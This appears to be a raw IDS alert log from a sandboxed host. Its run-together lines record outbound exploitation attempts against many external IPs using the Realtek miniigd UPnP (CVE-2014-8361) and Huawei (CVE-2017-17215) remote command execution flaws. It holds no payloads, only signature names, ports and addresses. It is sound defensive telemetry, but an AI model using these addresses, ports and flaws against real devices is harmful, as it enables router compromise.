                                      07/20/24-23:01:53.068033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3748452869192.168.2.23125.227.195.47
                                      07/20/24-23:01:42.979245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3416652869192.168.2.2327.36.59.232
                                      07/20/24-23:01:46.871315TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24764252869192.168.2.2394.51.135.205
                                      07/20/24-23:01:48.171604TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23709852869192.168.2.23170.211.30.37
                                      07/20/24-23:02:48.156942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4673052869192.168.2.23159.73.240.193
                                      07/20/24-23:01:01.205395TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708852869192.168.2.235.1.90.206
                                      07/20/24-23:01:04.637063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5485452869192.168.2.23164.236.243.93
                                      07/20/24-23:01:07.082045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367837215192.168.2.23197.20.163.179
                                      07/20/24-23:01:42.924014TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24987652869192.168.2.2359.110.210.1
                                      07/20/24-23:01:53.494330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4853252869192.168.2.23197.243.125.183
                                      07/20/24-23:01:41.337240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5720852869192.168.2.23160.40.68.243
                                      07/20/24-23:01:48.275988TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615498852869192.168.2.23200.200.4.87
                                      07/20/24-23:03:04.216653TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614981852869192.168.2.23137.33.102.155
                                      07/20/24-23:00:57.222229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473837215192.168.2.2341.9.160.205
                                      07/20/24-23:01:01.464786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615263452869192.168.2.23212.114.230.189
                                      07/20/24-23:01:42.207149TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3822852869192.168.2.2351.209.215.233
                                      07/20/24-23:01:42.774505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4137452869192.168.2.235.118.234.148
                                      07/20/24-23:01:44.756264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5264652869192.168.2.23128.242.86.47
                                      07/20/24-23:01:08.686800TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24668052869192.168.2.23216.207.228.137
                                      07/20/24-23:01:02.060344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5245637215192.168.2.23157.53.255.241
                                      07/20/24-23:01:34.050313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297837215192.168.2.23122.34.30.224
                                      07/20/24-23:01:04.053605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635837215192.168.2.23118.207.69.207
                                      07/20/24-23:01:41.299284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615477852869192.168.2.2380.104.187.148
                                      07/20/24-23:01:47.870904TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3919452869192.168.2.2339.76.169.126
                                      07/20/24-23:01:55.623247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5453852869192.168.2.23207.198.69.39
                                      07/20/24-23:01:12.807101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5393652869192.168.2.2335.68.164.37
                                      07/20/24-23:01:42.056014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615662252869192.168.2.23179.77.1.115
                                      07/20/24-23:01:46.387777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24417652869192.168.2.23137.85.104.5
                                      07/20/24-23:02:03.112911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614368852869192.168.2.2380.223.189.233
                                      07/20/24-23:01:14.117066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901037215192.168.2.23197.248.150.138
                                      07/20/24-23:01:42.571884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614780052869192.168.2.23190.100.221.147
                                      07/20/24-23:01:44.698984TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615924252869192.168.2.2313.31.40.78
                                      07/20/24-23:01:43.586276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288252869192.168.2.23177.64.16.178
                                      07/20/24-23:01:46.112515TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613794452869192.168.2.23152.179.89.83
                                      07/20/24-23:01:52.720788TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25693452869192.168.2.23161.89.104.148
                                      07/20/24-23:01:55.903210TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24922052869192.168.2.23185.10.206.42
                                      07/20/24-23:01:02.079114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4380637215192.168.2.2341.252.46.65
                                      07/20/24-23:01:43.843278TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5750852869192.168.2.23182.49.153.25
                                      07/20/24-23:01:02.328384TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615159652869192.168.2.23195.184.165.232
                                      07/20/24-23:01:02.220064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614721252869192.168.2.2354.68.100.131
                                      07/20/24-23:01:31.982478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355237215192.168.2.23197.121.218.24
                                      07/20/24-23:01:47.674845TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613712252869192.168.2.23138.132.84.64
                                      07/20/24-23:01:01.489542TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4440852869192.168.2.2382.63.31.170
                                      07/20/24-23:01:43.922614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4486652869192.168.2.2394.187.41.215
                                      07/20/24-23:01:58.143690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23554252869192.168.2.23192.45.244.106
                                      07/20/24-23:01:02.076414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317437215192.168.2.23197.121.129.192
                                      07/20/24-23:01:44.118192TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614091852869192.168.2.23150.183.171.74
                                      07/20/24-23:01:51.047414TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4317252869192.168.2.23203.128.56.168
                                      07/20/24-23:01:06.975117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131637215192.168.2.2341.211.71.10
                                      07/20/24-23:01:34.050672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187637215192.168.2.23157.212.249.90
                                      07/20/24-23:02:01.929550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5527252869192.168.2.23219.135.178.135
                                      07/20/24-23:01:20.132103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805037215192.168.2.2379.94.2.62
                                      07/20/24-23:01:50.332163TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4045452869192.168.2.2325.245.127.235
                                      07/20/24-23:01:03.258634TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613700052869192.168.2.2377.76.243.3
                                      07/20/24-23:01:14.006983TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614588652869192.168.2.2362.216.86.224
                                      07/20/24-23:01:45.610865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3546652869192.168.2.23148.216.25.247
                                      07/20/24-23:01:42.714534TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614401852869192.168.2.2339.205.206.142
                                      07/20/24-23:01:52.161851TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3810252869192.168.2.23208.98.159.35
                                      07/20/24-23:01:44.054566TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5045852869192.168.2.2344.113.54.165
                                      07/20/24-23:01:45.452336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4057252869192.168.2.2390.144.20.22
                                      07/20/24-23:01:03.882590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5058252869192.168.2.23212.172.247.72
                                      07/20/24-23:01:53.064325TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615978252869192.168.2.23131.175.175.175
                                      07/20/24-23:01:44.440718TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24942852869192.168.2.23159.247.88.93
                                      07/20/24-23:01:24.885849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391837215192.168.2.23157.249.229.44
                                      07/20/24-23:01:40.294677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3942437215192.168.2.23197.141.20.43
                                      07/20/24-23:01:41.182584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4118652869192.168.2.23150.183.54.123
                                      07/20/24-23:01:45.034156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4560852869192.168.2.23157.155.242.14
                                      07/20/24-23:02:00.710832TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23554852869192.168.2.2339.235.222.86
                                      07/20/24-23:01:44.602822TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25772652869192.168.2.2334.53.132.35
                                      07/20/24-23:01:43.918137TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3560452869192.168.2.23199.106.155.17
                                      07/20/24-23:01:03.834044TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5797852869192.168.2.23128.89.159.185
                                      07/20/24-23:01:40.332650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768837215192.168.2.23157.79.18.234
                                      07/20/24-23:01:00.633742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961837215192.168.2.23197.74.184.130
                                      07/20/24-23:01:14.060998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885837215192.168.2.23197.31.217.253
                                      07/20/24-23:01:43.084243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4904452869192.168.2.23128.197.233.56
                                      07/20/24-23:01:04.642910TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5694052869192.168.2.23170.225.184.185
                                      07/20/24-23:01:42.647416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614824652869192.168.2.2375.199.56.180
                                      07/20/24-23:01:08.621030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25631052869192.168.2.23136.74.174.143
                                      07/20/24-23:01:49.631749TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5201452869192.168.2.23111.101.151.97
                                      07/20/24-23:01:41.358696TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614329652869192.168.2.2362.203.112.129
                                      07/20/24-23:01:44.455702TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24568852869192.168.2.23207.214.48.137
                                      07/20/24-23:01:40.285038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255437215192.168.2.2399.254.210.2
                                      07/20/24-23:01:52.646505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5124652869192.168.2.23141.217.152.223
                                      07/20/24-23:01:54.835427TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25148852869192.168.2.23105.84.86.167
                                      07/20/24-23:01:52.919383TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5593252869192.168.2.2327.248.134.22
                                      07/20/24-23:01:12.807585TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23797252869192.168.2.232.129.228.59
                                      07/20/24-23:01:32.034562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484037215192.168.2.2341.111.248.140
                                      07/20/24-23:01:02.309528TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616072652869192.168.2.2338.47.147.236
                                      07/20/24-23:01:14.100332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761437215192.168.2.2354.24.241.219
                                      07/20/24-23:01:05.000501TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3941652869192.168.2.234.114.3.131
                                      07/20/24-23:01:57.050420TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6092252869192.168.2.23163.50.116.249
                                      07/20/24-23:01:47.267254TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708852869192.168.2.2334.85.175.26
                                      07/20/24-23:01:40.301143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704837215192.168.2.23149.181.71.228
                                      07/20/24-23:01:32.039719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625437215192.168.2.23197.178.133.102
                                      07/20/24-23:01:44.469869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287252869192.168.2.2343.168.154.99
                                      07/20/24-23:01:41.566623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5989452869192.168.2.23187.33.239.16
                                      07/20/24-23:01:03.270954TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614138652869192.168.2.2378.200.30.164
                                      07/20/24-23:01:42.692028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4583852869192.168.2.2377.249.102.196
                                      07/20/24-23:01:41.263141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616033052869192.168.2.23218.206.46.127
                                      07/20/24-23:01:31.316196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3656052869192.168.2.2366.164.253.202
                                      07/20/24-23:01:40.294677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924437215192.168.2.23178.28.45.219
                                      07/20/24-23:01:58.822700TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614967852869192.168.2.23111.239.243.106
                                      07/20/24-23:01:31.974569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990437215192.168.2.23197.228.52.144
                                      07/20/24-23:01:41.328263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3589252869192.168.2.23106.27.196.147
                                      07/20/24-23:01:41.383466TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614831652869192.168.2.23103.68.36.118
                                      07/20/24-23:01:54.930155TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25728252869192.168.2.23190.122.87.133
                                      07/20/24-23:01:59.593868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4620652869192.168.2.2342.127.253.166
                                      07/20/24-23:01:27.650871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694037215192.168.2.23157.96.159.120
                                      07/20/24-23:01:47.924852TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25893652869192.168.2.23162.230.61.146
                                      07/20/24-23:01:02.054387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138837215192.168.2.23131.154.57.89
                                      07/20/24-23:01:46.109136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4067052869192.168.2.2320.63.97.204
                                      07/20/24-23:00:59.203960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269237215192.168.2.23197.241.179.191
                                      07/20/24-23:01:03.207719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5923652869192.168.2.2334.184.40.220
                                      07/20/24-23:01:42.727671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5906052869192.168.2.2385.146.42.42
                                      07/20/24-23:01:07.022763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079837215192.168.2.23197.243.97.104
                                      07/20/24-23:01:27.651332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016037215192.168.2.23130.180.210.230
                                      07/20/24-23:02:53.715694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615021452869192.168.2.23207.46.6.6
                                      07/20/24-23:01:52.972472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6087052869192.168.2.23129.173.36.90
                                      07/20/24-23:01:26.719998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5605052869192.168.2.23179.142.123.85
                                      07/20/24-23:01:40.334452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081037215192.168.2.23157.45.76.10
                                      07/20/24-23:00:59.191389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475437215192.168.2.2341.24.39.230
                                      07/20/24-23:01:02.055683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052837215192.168.2.2341.179.196.52
                                      07/20/24-23:01:41.279072TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615002052869192.168.2.23186.5.70.201
                                      07/20/24-23:01:44.373922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5225852869192.168.2.23163.173.48.45
                                      07/20/24-23:02:26.420170TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3626052869192.168.2.2353.255.54.255
                                      07/20/24-23:01:58.202290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3435052869192.168.2.2378.168.25.83
                                      07/20/24-23:01:43.994464TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613971252869192.168.2.23188.26.26.188
                                      07/20/24-23:01:48.016319TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614208452869192.168.2.2377.15.73.106
                                      07/20/24-23:02:09.704983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5643652869192.168.2.23172.173.247.102
                                      07/20/24-23:01:21.923917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628637215192.168.2.2319.252.46.199
                                      07/20/24-23:01:13.994729TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615098852869192.168.2.23154.103.167.31
                                      07/20/24-23:01:11.180811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4087052869192.168.2.23164.126.39.49
                                      07/20/24-23:01:31.976984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025837215192.168.2.238.98.251.144
                                      07/20/24-23:02:07.942303TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614853052869192.168.2.23139.93.41.17
                                      07/20/24-23:01:24.889164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233637215192.168.2.23157.29.185.108
                                      07/20/24-23:01:56.991428TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615314452869192.168.2.2363.226.8.25
                                      07/20/24-23:01:31.982478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831837215192.168.2.2341.13.252.227
                                      07/20/24-23:01:48.286177TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936452869192.168.2.2341.3.4.242
                                      07/20/24-23:01:07.061779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028437215192.168.2.23197.70.24.118
                                      07/20/24-23:02:00.413915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4951652869192.168.2.23165.63.9.134
                                      07/20/24-23:01:43.917774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4259652869192.168.2.23172.124.39.209
                                      07/20/24-23:01:44.944699TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25616852869192.168.2.2391.160.10.25
                                      07/20/24-23:02:00.113044TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614781852869192.168.2.23104.83.225.175
                                      07/20/24-23:00:59.168569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4382837215192.168.2.23195.225.222.112
                                      07/20/24-23:01:11.818842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060437215192.168.2.23197.189.13.100
                                      07/20/24-23:01:53.697003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614945052869192.168.2.2385.241.89.47
                                      07/20/24-23:01:02.048113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745637215192.168.2.23197.90.236.107
                                      07/20/24-23:01:08.555688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5966252869192.168.2.2341.215.81.142
                                      07/20/24-23:01:41.345953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5917652869192.168.2.2386.18.150.91
                                      07/20/24-23:01:11.822392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164237215192.168.2.23197.153.22.137
                                      07/20/24-23:01:43.515688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615312052869192.168.2.23162.205.235.41
                                      07/20/24-23:01:43.013772TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614121852869192.168.2.23107.204.90.199
                                      07/20/24-23:01:11.639230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233237215192.168.2.2341.135.159.113
                                      07/20/24-23:01:44.589820TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24133452869192.168.2.23108.54.73.191
                                      07/20/24-23:01:07.036064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380837215192.168.2.2376.182.125.5
                                      07/20/24-23:01:20.592206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24096452869192.168.2.23221.64.55.120
                                      07/20/24-23:01:55.994693TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614476652869192.168.2.238.198.15.37
                                      07/20/24-23:01:47.729778TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25481652869192.168.2.23148.119.6.34
                                      07/20/24-23:01:42.000471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4664852869192.168.2.23141.211.193.35
                                      07/20/24-23:01:42.574571TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24919052869192.168.2.23202.140.13.200
                                      07/20/24-23:01:53.372532TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23382852869192.168.2.23196.46.94.209
                                      07/20/24-23:01:31.977603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774437215192.168.2.23169.189.57.200
                                      07/20/24-23:01:42.514942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3293652869192.168.2.2339.114.224.236
                                      07/20/24-23:01:41.399866TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614406052869192.168.2.2359.109.143.129
                                      07/20/24-23:01:42.500263TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613887652869192.168.2.23176.130.206.241
                                      07/20/24-23:01:47.569820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5923652869192.168.2.23163.47.80.71
                                      07/20/24-23:01:41.330687TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615275052869192.168.2.2394.66.88.32
                                      07/20/24-23:00:57.221550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782637215192.168.2.2341.76.26.43
                                      07/20/24-23:00:59.172943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040637215192.168.2.23157.51.198.43
                                      07/20/24-23:01:08.611773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23985652869192.168.2.23104.75.200.235
                                      07/20/24-23:01:31.974837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3580837215192.168.2.23169.97.93.18
                                      07/20/24-23:01:08.559170TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24712652869192.168.2.23190.124.94.237
                                      07/20/24-23:01:53.697942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25936652869192.168.2.2334.85.175.26
                                      07/20/24-23:01:48.496838TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615871652869192.168.2.23159.51.221.45
                                      07/20/24-23:01:40.334452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554237215192.168.2.23157.188.48.47
                                      07/20/24-23:01:06.991143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580837215192.168.2.23157.5.95.219
                                      07/20/24-23:01:11.631728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846637215192.168.2.23157.127.156.38
                                      07/20/24-23:01:50.380701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4042652869192.168.2.23139.56.86.16
